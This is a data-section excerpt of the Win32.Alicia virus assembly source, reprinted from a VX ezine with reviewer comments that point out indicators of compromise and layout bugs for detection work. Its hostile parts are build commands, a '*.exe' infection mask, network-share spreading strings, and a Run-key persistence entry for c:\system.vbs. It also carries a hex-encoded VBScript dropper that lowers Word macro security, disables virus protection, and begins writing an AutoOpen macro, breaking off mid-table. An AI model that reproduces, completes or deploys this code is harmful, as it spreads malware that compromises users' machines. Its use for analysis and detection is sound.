📄 29a-7.018
;Win32.Alicia
;(c) by Necronomikon/ZeroGravity
;****************************
; NOTE(review): this is virus source as republished in a VX ezine (the page
; title '29a-7.018' suggests 29A issue 7). It is kept for analysis and
; detection engineering only -- do not build or execute it outside an
; isolated lab. Only the .DATA section is visible in this chunk; the code
; section that drives these buffers and tables is not shown here.
; COMPILATION:
; tasm32 /ml /m3 alicia.asm,,;
; tlink32 /Tpe /aa /c /v alicia.obj,,, import32.lib,
;
.386
.model flat
locals
.DATA
; Author/infection banner. It is stored verbatim in writable .DATA and ships
; in the binary, so it is a usable static signature for this sample.
signature db '***Win32.Alicia***',13, 10
db '(c) by Necronomikon/ZeroGravity',0
;#######################
; Scratch state for the file-infection routine (the routine itself is not in
; this chunk; roles below are inferred from names and sizes -- confirm there).
handle1 db 50 dup(0)            ; 50-byte zero-filled name/handle buffers
handle2 db 50 dup(0)
maska db '*.exe',0              ; search mask, presumably the FindFirstFileA pattern
zgrext db 'luv.',0              ; 4-char tag string; its use is not visible here
handle_ dd 0                    ; DWORD "handles" (file/search handles, presumably)
_handle dd 0
; filedta: hand-laid-out WIN32_FIND_DATAA receive buffer. Field order and
; sizes up to dwReserved1 match the SDK (4+8+8+8+4+4+4+4 = 44 bytes).
filedta:
FileAttributes dd 0             ; dwFileAttributes
CreationTime db 8 dup(0)        ; FILETIME
LastAccessTime db 8 dup(0)      ; FILETIME
LastWriteTime db 8 dup(0)       ; FILETIME
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
; REVIEW: in the real structure cFileName is MAX_PATH (260) bytes and
; cAlternateFileName[14] follows it, total 318 bytes. Here only 50 bytes are
; reserved for the name, so filedta is 44+50+14 = 108 bytes and the remaining
; 210 bytes of a FindFirstFile/FindNextFile fill land in newfilename (50),
; path2 (25) and the first 135 bytes of path3. The API calls are outside this
; chunk -- verify, but as laid out this is an under-sized receive buffer.
nFileName db 50 dup('N')
nAltFileName db 14 dup(0)       ; correct size, but at the wrong offset (see above)
newfilename db 50 dup(0)
path2 db 25 dup(0)
path3 db 260 dup(0)             ; MAX_PATH-sized path buffer
_off_ dd 0
; WNet enumeration state, shaped for WNetOpenEnum/WNetEnumResource (the calls
; themselves are not in this chunk -- confirm in the code section).
Net_Struc_Count DD 1            ; lpcCount: request one entry per call
Enum_Buf_Size DD 666            ; lpBufferSize, in bytes
Enum_Buffer DB 666 DUP(0)       ; receives NETRESOURCE entries plus their strings
Enum_Handle DD 0                ; enumeration handle
Own_Path DB 260 DUP(0)          ; MAX_PATH buffer; presumably the module's own path -- confirm
; Network-spread strings. Remote_Trojan has NO terminator, so read as a C
; string it is 'T:T:\MSDOS.SYS' (it runs straight into MsDos_Sys). Whether
; that is a deliberate prefix trick or a bug is decided by code not shown here.
Remote_Drive DB 'T:', 0         ; drive letter for the mapped share, presumably lpLocalName
Remote_Trojan DB 'T:'
MsDos_Sys DB 'T:\MSDOS.SYS', 0  ; path on the mapped drive (MSDOS.SYS = Win9x boot config)
; Profile-file (win.ini style) section/key names and the dropper name. The
; Get/WriteProfileString-style calls are outside this chunk.
Win_Dir DB 260 DUP(0)
Win_Dir_Key DB 'WinDir', 0
Win_Ini_Run_Key DB 'run', 0     ; win.ini [windows] run= is a legacy autostart location
Windows_Section DB 'windows', 0
Paths_Section DB 'Paths', 0
Root_Dropper DB '\nwvf.exe', 0  ; IOC: file name used by the dropper (by name; use not shown)
Slash_Win_Ini DB '\'            ; deliberately unterminated: shares Default_String's 0 byte
Default_String DB 0             ; empty string, and the terminator for the '\' above
; winnetwk.h / winnt.h constants; values match the SDK.
RESOURCEUSAGE_CONTAINER EQU 00000002h
RESOURCETYPE_DISK EQU 00000001h
RESOURCE_GLOBALNET EQU 00000002h
FILE_ATTRIBUTE_HIDDEN EQU 2
; Placeholder target: 666.666.666.666 is not a valid IPv4 address, so as
; published this NETRESOURCE points nowhere. Treat it as a template, not a
; live share/C2 indicator.
NetBios_Remote DB '\\666.666.666.666', 0
; NETRESOURCE (8 DWORDs): dwScope, dwType, dwDisplayType, dwUsage,
; lpLocalName, lpRemoteName, lpComment, lpProvider.
Net_Resource_Struc:
DD 0                            ; dwScope
DD 0                            ; dwType
DD 0                            ; dwDisplayType
DD 0                            ; dwUsage
DD 0                            ; lpLocalName
DD OFFSET NetBios_Remote        ; lpRemoteName -> '\\666.666.666.666'
DD 0                            ; lpComment
DD 0                            ; lpProvider
; Second NETRESOURCE, same layout. Only the usage/local/remote slots are
; named, i.e. the fields the enumeration loop presumably reads back -- confirm.
Net_Resource: DD 0              ; dwScope
DD 0                            ; dwType
DD 0                            ; dwDisplayType
Net_Usage DD 0                  ; dwUsage (likely tested against RESOURCEUSAGE_CONTAINER)
Net_Local_Name DD 0             ; lpLocalName
Net_Remote_Name DD 0            ; lpRemoteName
DD 0                            ; lpComment
DD 0                            ; lpProvider
include useful.inc
;###########################
; Payload-dropper state. IOCs (hard-coded drop paths): c:\system.vbs and
; c:\alicia.doc.
copybuf db 50 dup(0)
copyhnd db 50 dup(0)
vbs_handle dd ?
vbsdropper db 'c:\system.vbs', 0   ; VBScript drop path (presumably written from the sys_ table below -- confirm)
szvbs db 220 dup (0)
doc_handle dd ?
docdropper db 'c:\alicia.doc', 0   ; Word document drop path (by name)
szdoc db 220 dup (0)
; Registry persistence: HKLM\Software\Microsoft\Windows\CurrentVersion\Run,
; value "Alicia" = "c:\system.vbs" -- machine-wide autostart of the VBS.
; Detection: alert on this Run value and on the two c:\ drop paths above.
REG_SZ equ 1
HKEY_LOCAL_MACHINE = 80000002h
; REVIEW: the SDK's KEY_ALL_ACCESS is 000F003Fh. 001F0000h is STANDARD_RIGHTS_ALL
; and carries no KEY_SET_VALUE bit, so on an NT kernel that enforces key ACLs a
; RegSetValueEx through a handle opened with this mask should fail with
; ERROR_ACCESS_DENIED (Win9x does not check). The registry calls are not in
; this chunk; verify which mask the code actually passes.
KEY_ALL_ACCESS = 001F0000h
REG_DWORD = 00000004h
value_name DB "Alicia",0
subkey DB "Software\Microsoft\Windows\CurrentVersion\Run",0
disposition DD ?                ; lpdwDisposition out-param (RegCreateKeyEx style)
new_value DB "c:\system.vbs",0
reghandle DD ?
;doc injector
;*************
; sys_ below is a plain-ASCII VBScript stored as hex bytes. Decoded, the
; visible part begins 'On Error Resume Next' / 'Win32/Word97.Alicia' and then:
;   - WSHShell.RegWrite HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM = 1
;     (trust access to the VBA project object model) and
;     HKCU\Software\Microsoft\Office\{10.0,9.0}\Word\Security\Level = 1
;     (macro security "Low") -- i.e. it disables Word's macro protection for
;     Word 2000 and Word 2002/XP before dropping a macro.
;   - Word.Application: Options.VirusProtection = (Rnd * 0) and
;     Options.SaveNormalPrompt = (Rnd * 0), both evaluate to 0/False.
;   - reads its own source with fso.OpenTextFile(WScript.ScriptFullName, 1),
;     then FSO.CreateTextFile("c:\sys1.dr0", True) and starts writing a VBA
;     'Sub AutoOpen()' / 'On Error Resume Next' / 'Dim nec() As Byte' stub.
; The table is cut off at the end of this chunk; the rest of the macro is not
; shown. IOCs from the decoded text: c:\sys1.dr0 and the two Security\Level
; and AccessVBOM values above.
sys_ DB 04FH,06EH,020H,045H,072H,072H,06FH,072H,020H,052H,065H,073H,075H,06DH
DB 065H,020H,04EH,065H,078H,074H,00DH,00AH,027H,057H,069H,06EH,033H,032H,02FH
DB 057H,06FH,072H,064H,039H,037H,02EH,041H,06CH,069H,063H,069H,061H,00DH,00AH
DB 027H,028H,063H,029H,062H,079H,020H,04EH,065H,063H,072H,06FH,06EH,06FH,06DH
DB 069H,06BH,06FH,06EH,02FH,05AH,065H,072H,030H,047H,072H,061H,076H,069H,074H
DB 079H,00DH,00AH,053H,065H,074H,020H,066H,073H,06FH,020H,03DH,020H,043H,072H
DB 065H,061H,074H,065H,04FH,062H,06AH,065H,063H,074H,028H,022H,053H,063H,072H
DB 069H,070H,074H,069H,06EH,067H,02EH,046H,069H,06CH,065H,053H,079H,073H,074H
DB 065H,06DH,04FH,062H,06AH,065H,063H,074H,022H,029H,00DH,00AH,053H,065H,074H
DB 020H,057H,069H,06EH,044H,069H,072H,020H,03DH,020H,066H,073H,06FH,02EH,047H
DB 065H,074H,053H,070H,065H,063H,069H,061H,06CH,046H,06FH,06CH,064H,065H,072H
DB 028H,030H,029H,00DH,00AH,053H,065H,074H,020H,057H,053H,048H,053H,068H,065H
DB 06CH,06CH,020H,03DH,020H,057H,053H,063H,072H,069H,070H,074H,02EH,043H,072H
DB 065H,061H,074H,065H,04FH,062H,06AH,065H,063H,074H,028H,022H,057H,053H,063H
DB 072H,069H,070H,074H,02EH,053H,068H,065H,06CH,06CH,022H,029H,00DH,00AH,057H
DB 053H,048H,053H,068H,065H,06CH,06CH,02EH,052H,065H,067H,057H,072H,069H,074H
DB 065H,020H,022H,048H,04BH,045H,059H,05FH,043H,055H,052H,052H,045H,04EH,054H
DB 05FH,055H,053H,045H,052H,05CH,053H,06FH,066H,074H,077H,061H,072H,065H,05CH
DB 04DH,069H,063H,072H,06FH,073H,06FH,066H,074H,05CH,04FH,066H,066H,069H,063H
DB 065H,05CH,031H,030H,02EH,030H,05CH,057H,06FH,072H,064H,05CH,053H,065H,063H
DB 075H,072H,069H,074H,079H,05CH,041H,063H,063H,065H,073H,073H,056H,042H,04FH
DB 04DH,022H,02CH,020H,031H,02CH,020H,022H,052H,045H,047H,05FH,044H,057H,04FH
DB 052H,044H,022H,00DH,00AH,057H,053H,048H,053H,068H,065H,06CH,06CH,02EH,052H
DB 065H,067H,057H,072H,069H,074H,065H,020H,022H,048H,04BH,045H,059H,05FH,043H
DB 055H,052H,052H,045H,04EH,054H,05FH,055H,053H,045H,052H,05CH,053H,06FH,066H
DB 074H,077H,061H,072H,065H,05CH,04DH,069H,063H,072H,06FH,073H,06FH,066H,074H
DB 05CH,04FH,066H,066H,069H,063H,065H,05CH,031H,030H,02EH,030H,05CH,057H,06FH
DB 072H,064H,05CH,053H,065H,063H,075H,072H,069H,074H,079H,05CH,04CH,065H,076H
DB 065H,06CH,022H,02CH,020H,031H,02CH,020H,022H,052H,045H,047H,05FH,044H,057H
DB 04FH,052H,044H,022H,00DH,00AH,057H,053H,048H,053H,068H,065H,06CH,06CH,02EH
DB 052H,065H,067H,057H,072H,069H,074H,065H,020H,022H,048H,04BH,045H,059H,05FH
DB 043H,055H,052H,052H,045H,04EH,054H,05FH,055H,053H,045H,052H,05CH,053H,06FH
DB 066H,074H,077H,061H,072H,065H,05CH,04DH,069H,063H,072H,06FH,073H,06FH,066H
DB 074H,05CH,04FH,066H,066H,069H,063H,065H,05CH,039H,02EH,030H,05CH,057H,06FH
DB 072H,064H,05CH,053H,065H,063H,075H,072H,069H,074H,079H,05CH,04CH,065H,076H
DB 065H,06CH,022H,02CH,020H,031H,02CH,020H,022H,052H,045H,047H,05FH,044H,057H
DB 04FH,052H,044H,022H,00DH,00AH,053H,065H,074H,020H,042H,061H,063H,06BH,075H
DB 070H,020H,03DH,020H,057H,053H,063H,072H,069H,070H,074H,02EH,043H,072H,065H
DB 061H,074H,065H,04FH,062H,06AH,065H,063H,074H,028H,022H,057H,06FH,072H,064H
DB 02EH,041H,070H,070H,06CH,069H,063H,061H,074H,069H,06FH,06EH,022H,029H,00DH
DB 00AH,042H,061H,063H,06BH,075H,070H,02EH,04FH,070H,074H,069H,06FH,06EH,073H
DB 02EH,056H,069H,072H,075H,073H,050H,072H,06FH,074H,065H,063H,074H,069H,06FH
DB 06EH,020H,03DH,020H,028H,052H,06EH,064H,020H,02AH,020H,030H,029H,00DH,00AH
DB 042H,061H,063H,06BH,075H,070H,02EH,04FH,070H,074H,069H,06FH,06EH,073H,02EH
DB 053H,061H,076H,065H,04EH,06FH,072H,06DH,061H,06CH,050H,072H,06FH,06DH,070H
DB 074H,020H,03DH,020H,028H,052H,06EH,064H,020H,02AH,020H,030H,029H,00DH,00AH
DB 053H,065H,074H,020H,062H,061H,062H,065H,020H,03DH,020H,066H,073H,06FH,02EH
DB 04FH,070H,065H,06EH,054H,065H,078H,074H,046H,069H,06CH,065H,028H,057H,053H
DB 063H,072H,069H,070H,074H,02EH,053H,063H,072H,069H,070H,074H,046H,075H,06CH
DB 06CH,04EH,061H,06DH,065H,02CH,020H,031H,029H,00DH,00AH,053H,063H,072H,069H
DB 070H,074H,052H,065H,061H,064H,031H,036H,020H,03DH,020H,062H,061H,062H,065H
DB 02EH,052H,065H,061H,064H,041H,06CH,06CH,00DH,00AH,062H,061H,062H,065H,02EH
DB 043H,06CH,06FH,073H,065H,00DH,00AH,00DH,00AH,053H,065H,074H,020H,044H,072H
DB 06FH,070H,046H,069H,06CH,065H,020H,03DH,020H,046H,053H,04FH,02EH,043H,072H
DB 065H,061H,074H,065H,054H,065H,078H,074H,046H,069H,06CH,065H,028H,022H,063H
DB 03AH,05CH,073H,079H,073H,031H,02EH,064H,072H,030H,022H,02CH,020H,054H,072H
DB 075H,065H,029H,00DH,00AH,044H,072H,06FH,070H,046H,069H,06CH,065H,02EH,057H
DB 072H,069H,074H,065H,04CH,069H,06EH,065H,020H,022H,053H,075H,062H,020H,041H
DB 075H,074H,06FH,04FH,070H,065H,06EH,028H,029H,022H,00DH,00AH,044H,072H,06FH
DB 070H,046H,069H,06CH,065H,02EH,057H,072H,069H,074H,065H,04CH,069H,06EH,065H
DB 020H,022H,04FH,06EH,020H,045H,072H,072H,06FH,072H,020H,052H,065H,073H,075H
DB 06DH,065H,020H,04EH,065H,078H,074H,022H,00DH,00AH,044H,072H,06FH,070H,046H
DB 069H,06CH,065H,02EH,057H,072H,069H,074H,065H,04CH,069H,06EH,065H,020H,022H
DB 044H,069H,06DH,020H,06EH,065H,063H,028H,029H,020H,041H,073H,020H,042H,079H
DB 074H,065H,022H,00DH,00AH,044H,072H,06FH,070H,046H,069H,06CH,065H,02EH,057H
DB 072H,069H,074H,065H,04CH,069H,06EH,065H,020H,022H,072H,065H,06DH,020H,057H
DB 069H,06EH,033H,032H,02FH,057H,04DH,039H,037H,02EH,041H,06CH,069H,063H,069H
DB 061H,022H,00DH,00AH,044H,072H,06FH,070H,046H,069H,06CH,065H,02EH,057H,072H
DB 069H,074H,065H,04CH,069H,06EH,065H,020H,022H,072H,065H,06DH,020H,028H,063H